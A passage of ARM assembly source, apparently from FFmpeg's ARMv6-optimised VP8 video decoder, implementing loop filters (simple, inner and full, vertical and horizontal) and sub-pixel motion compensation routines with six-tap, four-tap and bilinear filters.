orr r7, r7, r8 @ abs(p1 - q1)
orr r9, r9, r10 @ abs(p0 - q0)
uhadd8 r7, r7, lr @ abs(p1 - q2) >> 1
uqadd8 r9, r9, r9 @ abs(p0 - q0) * 2
uqadd8 r7, r7, r9 @ abs(p0 - q0)*2 + abs(p1-q1)/2
mvn r8, #0
usub8 r10, r12, r7 @ compare to flimit
sel r10, r8, lr @ filter mask: F or 0
cmp r10, #0
beq 2f
eor r3, r3, r2 @ ps1
eor r6, r6, r2 @ qs1
eor r4, r4, r2 @ ps0
eor r5, r5, r2 @ qs0
qsub8 r3, r3, r6 @ vp8_filter = p1 - q1
qsub8 r6, r5, r4 @ q0 - p0
qadd8 r3, r3, r6 @ += q0 - p0
lsr r7, r2, #5 @ 0x04040404
qadd8 r3, r3, r6 @ += q0 - p0
sub r9, r7, r2, lsr #7 @ 0x03030303
qadd8 r3, r3, r6 @ vp8_filter = p1-q1 + 3*(q0-p0)
and r3, r3, r10 @ vp8_filter &= mask
qadd8 r9, r3, r9 @ Filter2 = vp8_filter + 3
qadd8 r3, r3, r7 @ Filter1 = vp8_filter + 4
shadd8 r9, r9, lr
shadd8 r3, r3, lr
shadd8 r9, r9, lr
shadd8 r3, r3, lr
shadd8 r9, r9, lr @ Filter2 >>= 3
shadd8 r3, r3, lr @ Filter1 >>= 3
qadd8 r4, r4, r9 @ u = p0 + Filter2
qsub8 r5, r5, r3 @ u = q0 - Filter1
eor r4, r4, r2 @ *op0 = u ^ 0x80
eor r5, r5, r2 @ *oq0 = u ^ 0x80
.endm
@ void vp8_v_loop_filter16_simple(uint8_t *dst, int stride, int flim)
function ff_vp8_v_loop_filter16_simple_armv6, export=1
push {r4-r11, lr}
orr r2, r2, r2, lsl #16
mov r11, #4
mov lr, #0
orr r12, r2, r2, lsl #8
mov32 r2, 0x80808080
1:
ldr_nreg r3, r0, r1, lsl #1 @ p1
ldr_nreg r4, r0, r1 @ p0
ldr r5, [r0] @ q0
ldr r6, [r0, r1] @ q1
simple_filter
T sub r7, r0, r1
str r5, [r0] @ oq0
A str r4, [r0, -r1] @ op0
T str r4, [r7]
2:
subs r11, r11, #1
add r0, r0, #4
bne 1b
pop {r4-r11, pc}
endfunc
.macro filter_mask_p
uqsub8 r6, r9, r10 @ p3 - p2
uqsub8 r7, r10, r9 @ p2 - p3
uqsub8 r8, r10, r11 @ p2 - p1
uqsub8 r10, r11, r10 @ p1 - p2
orr r6, r6, r7 @ abs(p3-p2)
orr r8, r8, r10 @ abs(p2-p1)
uqsub8 lr, r6, r2 @ compare to limit
uqsub8 r8, r8, r2 @ compare to limit
uqsub8 r6, r11, r12 @ p1 - p0
orr lr, lr, r8
uqsub8 r7, r12, r11 @ p0 - p1
orr r6, r6, r7 @ abs(p1-p0)
uqsub8 r7, r6, r2 @ compare to limit
uqsub8 r8, r6, r3 @ compare to thresh
orr lr, lr, r7
.endm
.macro filter_mask_pq
uqsub8 r6, r11, r10 @ p1 - q1
uqsub8 r7, r10, r11 @ q1 - p1
uqsub8 r11, r12, r9 @ p0 - q0
uqsub8 r12, r9, r12 @ q0 - p0
orr r6, r6, r7 @ abs(p1-q1)
orr r12, r11, r12 @ abs(p0-q0)
mov32 r7, 0x7f7f7f7f
uqadd8 r12, r12, r12 @ abs(p0-q0) * 2
and r6, r7, r6, lsr #1 @ abs(p1-q1) / 2
uqadd8 r12, r12, r6 @ abs(p0-q0) * 2 + abs(p1-q1)/2
.endm
.macro filter_mask_v
filter_mask_p
ldr r10, [r0, r1] @ q1
ldr_post r9, r0, r1, lsl #1 @ q0
filter_mask_pq
ldr r11, [r0] @ q2
uqsub8 r7, r9, r10 @ q0 - q1
uqsub8 r6, r10, r9 @ q1 - q0
uqsub8 r12, r12, r4 @ compare to flimit
uqsub8 r9, r11, r10 @ q2 - q1
uqsub8 r10, r10, r11 @ q1 - q2
orr lr, lr, r12
ldr r12, [r0, r1] @ q3
orr r6, r7, r6 @ abs(q1-q0)
orr r10, r9, r10 @ abs(q2-q1)
uqsub8 r9, r12, r11 @ q3 - q2
uqsub8 r11, r11, r12 @ q2 - q3
uqsub8 r7, r6, r2 @ compare to limit
uqsub8 r10, r10, r2 @ compare to limit
uqsub8 r6, r6, r3 @ compare to thresh
orr r9, r9, r11 @ abs(q3-q2)
orr lr, lr, r7
orr lr, lr, r10
uqsub8 r9, r9, r2 @ compare to limit
orr lr, lr, r9
mov r12, #0
usub8 lr, r12, lr
mvn r11, #0
sel lr, r11, r12 @ filter mask
sub r0, r0, r1, lsl #1
.endm
.macro filter_mask_h
transpose r12, r11, r10, r9, r6, r7, r8, lr
filter_mask_p
stm sp, {r8, r11, r12, lr}
sub r0, r0, r1, lsl #2
add r0, r0, #4
ldr r7, [r0, r1]
ldr_post r6, r0, r1, lsl #1
ldr lr, [r0, r1]
ldr r8, [r0]
transpose r12, r11, r10, r9, r6, r7, r8, lr
uqsub8 r8, r12, r11 @ q3 - q2
uqsub8 lr, r11, r12 @ q2 - q3
uqsub8 r7, r9, r10 @ q0 - q1
uqsub8 r6, r10, r9 @ q1 - q0
uqsub8 r12, r11, r10 @ q2 - q1
uqsub8 r11, r10, r11 @ q1 - q2
orr r8, r8, lr @ abs(q3-q2)
orr r6, r7, r6 @ abs(q1-q0)
orr r11, r12, r11 @ abs(q2-q1)
ldr lr, [sp, #12] @ load back (f)limit accumulator
uqsub8 r8, r8, r2 @ compare to limit
uqsub8 r7, r6, r2 @ compare to limit
uqsub8 r11, r11, r2 @ compare to limit
orr lr, lr, r8
uqsub8 r8, r6, r3 @ compare to thresh
orr lr, lr, r7
ldr r12, [sp, #8] @ p1
orr lr, lr, r11
ldr r11, [sp, #4] @ p0
filter_mask_pq
mov r10, #0
uqsub8 r12, r12, r4 @ compare to flimit
mvn r11, #0
orr lr, lr, r12
usub8 lr, r10, lr
sel lr, r11, r10 @ filter mask
.endm
.macro filter inner
mov32 r12, 0x80808080
eor r11, r7, r12 @ ps1
eor r8, r8, r12 @ ps0
eor r9, r9, r12 @ qs0
eor r10, r10, r12 @ qs1
stm sp, {r8-r11}
qsub8 r7, r11, r10 @ vp8_signed_char_clamp(ps1-qs1)
qsub8 r8, r9, r8 @ vp8_signed_char_clamp(vp8_filter + 3 * ( qs0 - ps0))
.if \inner
and r7, r7, r6 @ vp8_filter &= hev
.endif
qadd8 r7, r7, r8
lsr r10, r12, #5 @ 0x04040404
qadd8 r7, r7, r8
sub r9, r10, r12, lsr #7 @ 0x03030303
qadd8 r7, r7, r8
and r7, r7, lr @ vp8_filter &= mask
.if !\inner
mov r12, r7 @ Filter2
and r7, r7, r6 @ Filter2 &= hev
.endif
qadd8 lr, r7, r9 @ Filter2 = vp8_signed_char_clamp(vp8_filter+3)
qadd8 r7, r7, r10 @ Filter1 = vp8_signed_char_clamp(vp8_filter+4)
mov r9, #0
shadd8 lr, lr, r9 @ Filter2 >>= 3
shadd8 r7, r7, r9 @ Filter1 >>= 3
shadd8 lr, lr, r9
shadd8 r7, r7, r9
shadd8 lr, lr, r9 @ Filter2
shadd8 r7, r7, r9 @ Filter1
.endm
.macro filter_v inner
orr r10, r6, r8 @ calculate vp8_hevmask
ldr_nreg r7, r0, r1, lsl #1 @ p1
usub8 r10, r12, r10
ldr_nreg r8, r0, r1 @ p0
sel r6, r12, r11 @ obtain vp8_hevmask
ldr r9, [r0] @ q0
ldr r10, [r0, r1] @ q1
filter \inner
.endm
.macro filter_h inner
orr r9, r6, r8
usub8 r9, r12, r9
sel r6, r12, r11 @ hev mask
stm sp, {r6, lr}
ldr_nreg r12, r0, r1, lsl #1
ldr_nreg r11, r0, r1
ldr r6, [r0]
ldr lr, [r0, r1]
transpose r10, r9, r8, r7, r12, r11, r6, lr
ldm sp, {r6, lr}
filter \inner
.endm
.macro filter_inner
ldm sp, {r8, r9}
lsr r10, r10, #2 @ 0x01010101
qadd8 r8, r8, lr @ u = vp8_signed_char_clamp(ps0 + Filter2)
mov lr, #0
qsub8 r9, r9, r7 @ u = vp8_signed_char_clamp(qs0 - Filter1)
sadd8 r7, r7, r10 @ vp8_filter += 1
ldr r10, [sp, #8] @ qs1
shadd8 r7, r7, lr @ vp8_filter >>= 1
eor r8, r8, r12 @ *op0 = u ^ 0x80
bic r7, r7, r6 @ vp8_filter &= ~hev
qadd8 r11, r11, r7 @ u = vp8_signed_char_clamp(ps1 + vp8_filter)
eor r9, r9, r12 @ *oq0 = u ^ 0x80
qsub8 r10, r10, r7 @ u = vp8_signed_char_clamp(qs1 - vp8_filter)
eor r11, r11, r12 @ *op1 = u ^ 0x80
eor r10, r10, r12 @ *oq1 = u ^ 0x80
.endm
.macro filter_x c0
mov lr, \c0
mov r7, #63
sxtb16 r6, r12
sxtb16 r10, r12, ror #8
smlabb r8, r6, lr, r7
smlatb r6, r6, lr, r7
smlabb r7, r10, lr, r7
smultb r10, r10, lr
ssat r8, #8, r8, asr #7
ssat r6, #8, r6, asr #7
add r10, r10, #63
ssat r7, #8, r7, asr #7
ssat r10, #8, r10, asr #7
pkhbt r6, r8, r6, lsl #16
pkhbt r10, r7, r10, lsl #16
uxtb16 r6, r6
uxtb16 r10, r10
mov32 lr, 0x80808080
orr r10, r6, r10, lsl #8 @ u = vp8_signed_char_clamp((63 + Filter2 * 27)>>7)
qsub8 r8, r9, r10 @ s = vp8_signed_char_clamp(qs0 - u)
qadd8 r10, r11, r10 @ s = vp8_signed_char_clamp(ps0 + u)
eor r8, r8, lr @ *oq0 = s ^ 0x80
eor r10, r10, lr @ *op0 = s ^ 0x80
.endm
.macro filter_1
ldm sp, {r8, r9}
qadd8 r11, r8, lr
qsub8 r9, r9, r7
bic r12, r12, r6 @ vp8_filter &= ~hev
filter_x #27
.endm
.macro filter_2
ldr r9, [sp, #8] @ qs1
ldr r11, [sp, #12] @ ps1
filter_x #18
.endm
.macro filter_3
eor r9, r9, lr
eor r11, r11, lr
filter_x #9
.endm
function vp8_v_loop_filter_inner_armv6
mov r5, #4
sub sp, sp, #16
orr r2, r2, r2, lsl #16
orr r3, r3, r3, lsl #16
orr r6, r6, r6, lsl #16
orr r4, r2, r2, lsl #8 @ flimE
orr r2, r3, r3, lsl #8 @ flimI
orr r3, r6, r6, lsl #8 @ thresh
1:
sub r0, r0, r1, lsl #2
ldr r10, [r0, r1] @ p2
ldr_post r9, r0, r1, lsl #1 @ p3
ldr r12, [r0, r1] @ p0
ldr_post r11, r0, r1, lsl #1 @ p1
filter_mask_v
cmp lr, #0
beq 2f
filter_v inner=1
filter_inner
A str r11, [r0, -r1, lsl #1] @ op1
A str r8, [r0, -r1] @ op0
T sub r0, r0, r1, lsl #1
T str r8, [r0, r1]
T str_post r11, r0, r1, lsl #1
str r9, [r0] @ oq0
str r10, [r0, r1] @ oq1
2:
add r0, r0, #4
cmp r5, #3
it eq
ldreq r0, [sp, #16]
subs r5, r5, #1
bne 1b
add sp, sp, #16
pop {r0, r4-r11, pc}
endfunc
function ff_vp8_v_loop_filter16_inner_armv6, export=1
push {r4-r11, lr}
add r12, r0, #8
push {r12}
ldr r6, [sp, #40]
orr r2, r2, r2, lsl #16
b vp8_v_loop_filter_inner_armv6
endfunc
function ff_vp8_v_loop_filter8uv_inner_armv6, export=1
push {r1, r4-r11, lr}
mov r1, r2
orr r2, r3, r3, lsl #16
ldr r3, [sp, #40]
ldr r6, [sp, #44]
b vp8_v_loop_filter_inner_armv6
endfunc
function vp8_v_loop_filter_armv6
mov r5, #4
sub sp, sp, #16
orr r3, r3, r3, lsl #16
orr r6, r6, r6, lsl #16
orr r4, r2, r2, lsl #8 @ flimE
orr r2, r3, r3, lsl #8 @ flimI
orr r3, r6, r6, lsl #8 @ thresh
1:
sub r0, r0, r1, lsl #2
ldr r10, [r0, r1] @ p2
ldr_post r9, r0, r1, lsl #1 @ p3
ldr r12, [r0, r1] @ p0
ldr_post r11, r0, r1, lsl #1 @ p1
filter_mask_v
cmp lr, #0
beq 2f
filter_v inner=0
filter_1
str r8, [r0] @ *oq0
A str r10, [r0, -r1] @ *op0
T sub r0, r0, r1, lsl #1
T str r10, [r0, r1]
filter_2
A str r10, [r0, -r1, lsl #1] @ *op1
T str_post r10, r0, r1, lsl #1
str r8, [r0, r1] @ *oq1
ldr r9, [r0, r1, lsl #1] @ q2
add r0, r0, r1
A ldr r11, [r0, -r1, lsl #2] @ p2
T ldr_dpre r11, r0, r1, lsl #2
filter_3
A str r10, [r0, -r1, lsl #2] @ *op2
T str_post r10, r0, r1, lsl #2
str r8, [r0, r1] @ *oq2
sub r0, r0, r1
2:
add r0, r0, #4
cmp r5, #3
it eq
ldreq r0, [sp, #16]
subs r5, r5, #1
bne 1b
add sp, sp, #16
pop {r0, r4-r11, pc}
endfunc
function ff_vp8_v_loop_filter16_armv6, export=1
push {r4-r11, lr}
add r12, r0, #8
push {r12}
ldr r6, [sp, #40]
orr r2, r2, r2, lsl #16
b vp8_v_loop_filter_armv6
endfunc
function ff_vp8_v_loop_filter8uv_armv6, export=1
push {r1, r4-r11, lr}
mov r1, r2
orr r2, r3, r3, lsl #16
ldr r3, [sp, #40]
ldr r6, [sp, #44]
b vp8_v_loop_filter_armv6
endfunc
@ void vp8_h_loop_filter16_simple(uint8_t *dst, int stride, int flim)
function ff_vp8_h_loop_filter16_simple_armv6, export=1
push {r4-r11, lr}
orr r12, r2, r2, lsl #16
mov32 r2, 0x80808080
orr r12, r12, r12, lsl #8
mov lr, #0
mov r11, #4
1:
sub r0, r0, #2
ldr r8, [r0, r1]
ldr_post r7, r0, r1, lsl #1
ldr r10, [r0, r1]
ldr_post r9, r0, r1, lsl #1
add r0, r0, #2
transpose r6, r5, r4, r3, r7, r8, r9, r10
simple_filter
sub r0, r0, r1, lsl #2
sub r0, r0, #1
uxtb16 r6, r4
uxtb16 r8, r5
uxtb16 r7, r4, ror #8
uxtb16 r9, r5, ror #8
orr r6, r6, r8, lsl #8
orr r7, r7, r9, lsl #8
lsr r4, r6, #16
lsr r5, r7, #16
strh_post r6, r0, r1
strh_post r7, r0, r1
strh_post r4, r0, r1
strh_post r5, r0, r1
add r0, r0, #1
2:
subs r11, r11, #1
bne 1b
pop {r4-r11, pc}
endfunc
function vp8_h_loop_filter_inner_armv6
mov r5, #4
sub sp, sp, #16
orr r3, r3, r3, lsl #16
orr r9, r9, r9, lsl #16
orr r4, r2, r2, lsl #8 @ flimE
orr r2, r3, r3, lsl #8 @ flimI
orr r3, r9, r9, lsl #8 @ thresh
sub r0, r0, #4
1:
ldr r7, [r0, r1]
ldr_post r6, r0, r1, lsl #1
ldr lr, [r0, r1]
ldr_post r8, r0, r1, lsl #1
filter_mask_h
cmp lr, #0
sub r0, r0, #2
beq 2f
ldr r6, [sp]
filter_h inner=1
filter_inner
transpose lr, r12, r7, r6, r11, r8, r9, r10
A str r6, [r0, -r1, lsl #1]
A str r7, [r0, -r1]
T sub r0, r0, r1, lsl #1
T str r7, [r0, r1]
T str_post r6, r0, r1, lsl #1
str r12, [r0]
str lr, [r0, r1]
2:
sub r0, r0, #2
add r0, r0, r1, lsl #1
cmp r5, #3
it eq
ldreq r0, [sp, #16]
subs r5, r5, #1
bne 1b
add sp, sp, #16
pop {r0, r4-r11, pc}
endfunc
function ff_vp8_h_loop_filter16_inner_armv6, export=1
push {r4-r11, lr}
add r12, r0, r1, lsl #3
sub r12, r12, #4
push {r12}
ldr r9, [sp, #40]
orr r2, r2, r2, lsl #16
b vp8_h_loop_filter_inner_armv6
endfunc
function ff_vp8_h_loop_filter8uv_inner_armv6, export=1
sub r1, r1, #4
push {r1, r4-r11, lr}
mov r1, r2
orr r2, r3, r3, lsl #16
ldr r3, [sp, #40]
ldr r9, [sp, #44]
b vp8_h_loop_filter_inner_armv6
endfunc
function vp8_h_loop_filter_armv6
mov r5, #4
sub sp, sp, #16
orr r3, r3, r3, lsl #16
orr r9, r9, r9, lsl #16
orr r4, r2, r2, lsl #8 @ flimE
orr r2, r3, r3, lsl #8 @ flimI
orr r3, r9, r9, lsl #8 @ thresh
1:
sub r0, r0, #4
ldr r7, [r0, r1]
ldr_post r6, r0, r1, lsl #1
ldr lr, [r0, r1]
ldr_post r8, r0, r1, lsl #1
filter_mask_h
cmp lr, #0
it eq
addeq r0, r0, r1, lsl #1
beq 2f
ldr r6, [sp]
sub r0, r0, #2
filter_h inner=0
filter_1
sub r0, r0, r1, lsl #1
uxtb16 r6, r10
uxtb16 r7, r8
uxtb16 r10, r10, ror #8
uxtb16 r8, r8, ror #8
orr r6, r6, r7, lsl #8
orr r10, r10, r8, lsl #8
lsr r7, r6, #16
lsr r8, r10, #16
add r0, r0, #1
strh_post r6, r0, r1
strh_post r10, r0, r1
strh_post r7, r0, r1
strh_post r8, r0, r1
filter_2
sub r0, r0, r1, lsl #2
add r0, r0, #3
ldrb r11, [r0, #-5] @ p2 for 1/7th difference
strb r10, [r0, #-4] @ op1
strb r8, [r0, #-1] @ oq1
ldrb_post r9, r0, r1 @ q2 for 1/7th difference
lsr r10, r10, #8
lsr r8, r8, #8
ldrb r6, [r0, #-5]
strb r10, [r0, #-4]
strb r8, [r0, #-1]
ldrb_post r7, r0, r1
lsr r10, r10, #8
lsr r8, r8, #8
orr r11, r11, r6, lsl #8
orr r9, r9, r7, lsl #8
ldrb r6, [r0, #-5]
strb r10, [r0, #-4]
strb r8, [r0, #-1]
ldrb_post r7, r0, r1
lsr r10, r10, #8
lsr r8, r8, #8
orr r11, r11, r6, lsl #16
orr r9, r9, r7, lsl #16
ldrb r6, [r0, #-5]
strb r10, [r0, #-4]
strb r8, [r0, #-1]
ldrb_post r7, r0, r1
orr r11, r11, r6, lsl #24
orr r9, r9, r7, lsl #24
filter_3
sub r0, r0, r1, lsl #2
strb r10, [r0, #-5]
strb_post r8, r0, r1
lsr r10, r10, #8
lsr r8, r8, #8
strb r10, [r0, #-5]
strb_post r8, r0, r1
lsr r10, r10, #8
lsr r8, r8, #8
strb r10, [r0, #-5]
strb_post r8, r0, r1
lsr r10, r10, #8
lsr r8, r8, #8
strb r10, [r0, #-5]
strb_post r8, r0, r1
sub r0, r0, #2
2:
cmp r5, #3
it eq
ldreq r0, [sp, #16]
subs r5, r5, #1
bne 1b
add sp, sp, #16
pop {r0, r4-r11, pc}
endfunc
function ff_vp8_h_loop_filter16_armv6, export=1
push {r4-r11, lr}
add r12, r0, r1, lsl #3
push {r12}
ldr r9, [sp, #40]
orr r2, r2, r2, lsl #16
b vp8_h_loop_filter_armv6
endfunc
function ff_vp8_h_loop_filter8uv_armv6, export=1
push {r1, r4-r11, lr}
mov r1, r2
orr r2, r3, r3, lsl #16
ldr r3, [sp, #40]
ldr r9, [sp, #44]
b vp8_h_loop_filter_armv6
endfunc
.ltorg
@ MC
@ void put_vp8_pixels16(uint8_t *dst, int dststride, uint8_t *src,
@ int srcstride, int h, int mx, int my)
function ff_put_vp8_pixels16_armv6, export=1
push {r4-r11}
ldr r12, [sp, #32] @ h
1:
subs r12, r12, #2
ldr r5, [r2, #4]
ldr r6, [r2, #8]
ldr r7, [r2, #12]
ldr_post r4, r2, r3
ldr r9, [r2, #4]
ldr r10, [r2, #8]
ldr r11, [r2, #12]
ldr_post r8, r2, r3
strd r6, r7, [r0, #8]
strd_post r4, r5, r0, r1
strd r10, r11, [r0, #8]
strd_post r8, r9, r0, r1
bgt 1b
pop {r4-r11}
bx lr
endfunc
@ void put_vp8_pixels8(uint8_t *dst, int dststride, uint8_t *src,
@ int srcstride, int h, int mx, int my)
function ff_put_vp8_pixels8_armv6, export=1
push {r4-r11}
ldr r12, [sp, #32] @ h
1:
subs r12, r12, #4
ldr r5, [r2, #4]
ldr_post r4, r2, r3
ldr r7, [r2, #4]
ldr_post r6, r2, r3
ldr r9, [r2, #4]
ldr_post r8, r2, r3
ldr r11, [r2, #4]
ldr_post r10, r2, r3
strd_post r4, r5, r0, r1
strd_post r6, r7, r0, r1
strd_post r8, r9, r0, r1
strd_post r10, r11, r0, r1
bgt 1b
pop {r4-r11}
bx lr
endfunc
@ void put_vp8_pixels4(uint8_t *dst, int dststride, uint8_t *src,
@ int srcstride, int h, int mx, int my)
function ff_put_vp8_pixels4_armv6, export=1
ldr r12, [sp, #0] @ h
push {r4-r6,lr}
1:
subs r12, r12, #4
ldr_post r4, r2, r3
ldr_post r5, r2, r3
ldr_post r6, r2, r3
ldr_post lr, r2, r3
str_post r4, r0, r1
str_post r5, r0, r1
str_post r6, r0, r1
str_post lr, r0, r1
bgt 1b
pop {r4-r6,pc}
endfunc
@ note: worst case sum of all 6-tap filter values * 255 is 0x7f80 so 16 bit
@ arithmatic can be used to apply filters
const sixtap_filters_13245600, align=4
.short 2, 108, -11, 36, -8, 1, 0, 0
.short 3, 77, -16, 77, -16, 3, 0, 0
.short 1, 36, -8, 108, -11, 2, 0, 0
endconst
const fourtap_filters_1324, align=4
.short -6, 12, 123, -1
.short -9, 50, 93, -6
.short -6, 93, 50, -9
.short -1, 123, 12, -6
endconst
.macro vp8_mc_1 name, size, hv
function ff_put_vp8_\name\size\()_\hv\()_armv6, export=1
sub r1, r1, #\size
mov r12, sp
push {r1, r4-r11, lr}
ldm r12, {r5-r7}
mov r4, #\size
stm r12, {r4, r5}
orr r12, r6, r7
b bl_put_\name\()_\hv\()_armv6
endfunc
.endm
vp8_mc_1 epel, 16, h6
vp8_mc_1 epel, 16, v6
vp8_mc_1 epel, 8, h6
vp8_mc_1 epel, 8, v6
vp8_mc_1 epel, 8, h4
vp8_mc_1 epel, 8, v4
vp8_mc_1 epel, 4, h6
vp8_mc_1 epel, 4, v6
vp8_mc_1 epel, 4, h4
vp8_mc_1 epel, 4, v4
vp8_mc_1 bilin, 16, h
vp8_mc_1 bilin, 16, v
vp8_mc_1 bilin, 8, h
vp8_mc_1 bilin, 8, v
vp8_mc_1 bilin, 4, h
vp8_mc_1 bilin, 4, v
/* True relational expressions have the value -1 in the GNU assembler,
+1 in Apple's. */
#ifdef __APPLE__
# define TMPSIZE \size * (8 + 8*(\size > 4) + \ytaps - 1)
#else
# define TMPSIZE \size * (8 - 8*(\size > 4) + \ytaps - 1)
#endif
.macro vp8_mc_hv name, size, h, v, ytaps
function ff_put_vp8_\name\size\()_\h\v\()_armv6, export=1
push {r0, r1, r4, lr}
add r0, sp, #16
sub sp, sp, #TMPSIZE+16
ldm r0, {r0, r12}
mov r4, #\size
add lr, r0, #\ytaps-1
.if \ytaps > 2
sub r2, r2, r3, lsl #\ytaps >> 1 & 1
.endif
stm sp, {r4, lr}
add r0, sp, #16
mov r1, #0
bl vp8_put_\name\()_\h\()_armv6
add r0, sp, #TMPSIZE+16
ldr lr, [sp, #TMPSIZE+16+16]
ldm r0, {r0, r1}
mov r3, #\size
ldr r12, [sp, #TMPSIZE+16+16+8]
str lr, [sp, #4]
add r2, sp, #16 + \size * (\ytaps / 2 - 1)
sub r1, r1, #\size
bl vp8_put_\name\()_\v\()_armv6
add sp, sp, #TMPSIZE+16+8
pop {r4, pc}
endfunc
.endm
vp8_mc_hv epel, 16, h6, v6, 6
vp8_mc_hv epel, 8, h6, v6, 6
vp8_mc_hv epel, 8, h4, v6, 6
vp8_mc_hv epel, 8, h6, v4, 4
vp8_mc_hv epel, 8, h4, v4, 4
vp8_mc_hv epel, 4, h6, v6, 6
vp8_mc_hv epel, 4, h4, v6, 6
vp8_mc_hv epel, 4, h6, v4, 4
vp8_mc_hv epel, 4, h4, v4, 4
vp8_mc_hv bilin, 16, h, v, 2
vp8_mc_hv bilin, 8, h, v, 2
vp8_mc_hv bilin, 4, h, v, 2
.macro sat4 r0, r1, r2, r3
asr \r0, \r0, #7
asr \r1, \r1, #7
pkhbt \r0, \r0, \r2, lsl #9
pkhbt \r1, \r1, \r3, lsl #9
usat16 \r0, #8, \r0
usat16 \r1, #8, \r1
orr \r0, \r0, \r1, lsl #8
.endm
@ Calling convention for the inner MC functions:
@ r0 dst
@ r1 dst_stride - block_width
@ r2 src
@ r3 src_stride
@ r4 block_width
@ r12 filter_index
@ [sp] block_width
@ [sp+4] height
@ [sp+8] scratch
function vp8_put_epel_h6_armv6
push {r1, r4-r11, lr}
bl_put_epel_h6_armv6:
sub r2, r2, #2
movrel lr, sixtap_filters_13245600 - 16
add lr, lr, r12, lsl #3
sub r3, r3, r4
str r3, [sp, #48]
ldm lr, {r1, r3, lr}
1:
ldr r7, [r2, #5] @ src[5-8]
ldr r6, [r2, #2] @ src[2-5]
ldr r5, [r2], #4 @ src[0-3]
pkhtb r7, r7, r7, asr #8 @ src[8,7,7,6]
uxtb16 r9, r6, ror #8 @ src[5] | src[3]
uxtb16 r6, r6 @ src[4] | src[2]
uxtb16 r8, r5, ror #8 @ src[3] | src[1]
uxtb16 r11, r7, ror #8 @ src[8] | src[7]
uxtb16 r7, r7 @ src[7] | src[6]
uxtb16 r5, r5 @ src[2] | src[0]
mov r10, #0x40
smlad r5, r5, r1, r10 @ filter[0][0]
smlad r11, r11, lr, r10 @ filter[3][2]
smlad r12, r7, lr, r10 @ filter[2][2]
smlad r10, r8, r1, r10 @ filter[1][0]
smlad r5, r8, r3, r5 @ filter[0][1]
smlad r11, r9, r1, r11 @ filter[3][0]
smlad r12, r9, r3, r12 @ filter[2][1]
pkhtb r9, r9, r6, asr #16 @ src[5] | src[4]
smlad r10, r6, r3, r10 @ filter[1][1]
pkhbt r7, r9, r7, lsl #16 @ src[6] | src[4]
smlad r5, r9, lr, r5 @ filter[0][2]
pkhtb r8, r7, r9, asr #16 @ src[6] | src[5]
smlad r11, r7, r3, r11 @ filter[3][1]
smlad r9, r8, lr, r10 @ filter[1][2]
smlad r7, r6, r1, r12 @ filter[2][0]
subs r4, r4, #4
sat4 r5, r9, r7, r11
str r5, [r0], #4
bne 1b
add r4, sp, #40
ldm r4, {r4, r5, r12}
ldr r6, [sp]
subs r5, r5, #1
add r2, r2, r12
str r5, [sp, #44]
add r0, r0, r6
bne 1b
pop {r1, r4-r11, pc}
endfunc
function vp8_put_epel_v6_armv6
push {r1, r4-r11, lr}
bl_put_epel_v6_armv6:
movrel lr, sixtap_filters_13245600 - 16
add lr, lr, r12, lsl #3
str r3, [sp, #48]
1:
add r1, r3, r3, lsl #1 @ stride * 3
ldr_nreg r5, r2, r3 @ src[0,1,2,3 + stride * 1]
ldr r6, [r2, r3] @ src[0,1,2,3 + stride * 3]
ldr r7, [r2, r3, lsl #1] @ src[0,1,2,3 + stride * 4]
ldr r8, [r2, r1] @ src[0,1,2,3 + stride * 5]
uxtb16 r9, r5, ror #8 @ src[3 + s*1] | src[1 + s*1]
uxtb16 r10, r6, ror #8 @ src[3 + s*3] | src[1 + s*3]
uxtb16 r11, r7, ror #8 @ src[3 + s*4] | src[1 + s*4]
uxtb16 r12, r8, ror #8 @ src[3 + s*5] | src[1 + s*5]
uxtb16 r5, r5 @ src[2 + s*1] | src[0 + s*1]
uxtb16 r6, r6 @ src[2 + s*3] | src[0 + s*3]
uxtb16 r7, r7 @ src[2 + s*4] | src[0 + s*4]
uxtb16 r8, r8 @ src[2 + s*5] | src[0 + s*5]
pkhbt r1, r9, r10, lsl #16 @ src[1 + s*3] | src[1 + s*1]
pkhtb r9, r10, r9, asr #16 @ src[3 + s*3] | src[3 + s*1]
pkhbt r10, r11, r12, lsl #16 @ src[1 + s*5] | src[1 + s*4]
pkhtb r11, r12, r11, asr #16 @ src[3 + s*5] | src[3 + s*4]
pkhbt r12, r5, r6, lsl #16 @ src[0 + s*3] | src[0 + s*1]
pkhtb r5, r6, r5, asr #16 @ src[2 + s*3] | src[2 + s*1]
pkhbt r6, r7, r8, lsl #16 @ src[0 + s*5] | src[0 + s*4]
pkhtb r7, r8, r7, asr #16 @ src[2 + s*5] | src[2 + s*4]
ldr r8, [lr, #4]
mov r3, #0x40
smlad r12, r12, r8, r3 @ filter[0][1]
smlad r1, r1, r8, r3 @ filter[1][1]
smlad r5, r5, r8, r3 @ filter[2][1]
smlad r9, r9, r8, r3 @ filter[3][1]
ldr r8, [lr, #8]
ldr r3, [sp, #48]
smlad r12, r6, r8, r12 @ filter[0][2]
smlad r1, r10, r8, r1 @ filter[1][2]
ldr_nreg r6, r2, r3, lsl #1 @ src[0,1,2,3 + stride * 0]
ldr r10, [r2], #4 @ src[0,1,2,3 + stride * 2]
smlad r5, r7, r8, r5 @ filter[2][2]
smlad r9, r11, r8, r9 @ filter[3][2]
uxtb16 r7, r6, ror #8 @ src[3 + s*0] | src[1 + s*0]
uxtb16 r11, r10, ror #8 @ src[3 + s*2] | src[1 + s*2]
uxtb16 r6, r6 @ src[2 + s*0] | src[0 + s*0]
uxtb16 r10, r10 @ src[2 + s*2] | src[0 + s*2]
pkhbt r8, r7, r11, lsl #16 @ src[1 + s*2] | src[1 + s*0]
pkhtb r7, r11, r7, asr #16 @ src[3 + s*2] | src[3 + s*0]
pkhbt r11, r6, r10, lsl #16 @ src[0 + s*2] | src[0 + s*0]
pkhtb r6, r10, r6, asr #16 @ src[2 + s*2] | src[2 + s*0]
ldr r10, [lr]
subs r4, r4, #4
smlad r12, r11, r10, r12 @ filter[0][0]
smlad r1, r8, r10, r1 @ filter[1][0]
smlad r5, r6, r10, r5 @ filter[2][0]
smlad r9, r7, r10, r9 @ filter[3][0]
sat4 r12, r1, r5, r9
str r12, [r0], #4
bne 1b
ldrd r4, r5, [sp, #40]
ldr r6, [sp]
subs r5, r5, #1
sub r2, r2, r4
str r5, [sp, #44]
add r0, r0, r6
add r2, r2, r3
bne 1b
pop {r1, r4-r11, pc}
endfunc
function vp8_put_epel_h4_armv6
push {r1, r4-r11, lr}
bl_put_epel_h4_armv6:
subs r2, r2, #1
movrel lr, fourtap_filters_1324 - 4
add lr, lr, r12, lsl #2
sub r3, r3, r4
ldm lr, {r5, r6}
ldr lr, [sp, #44]
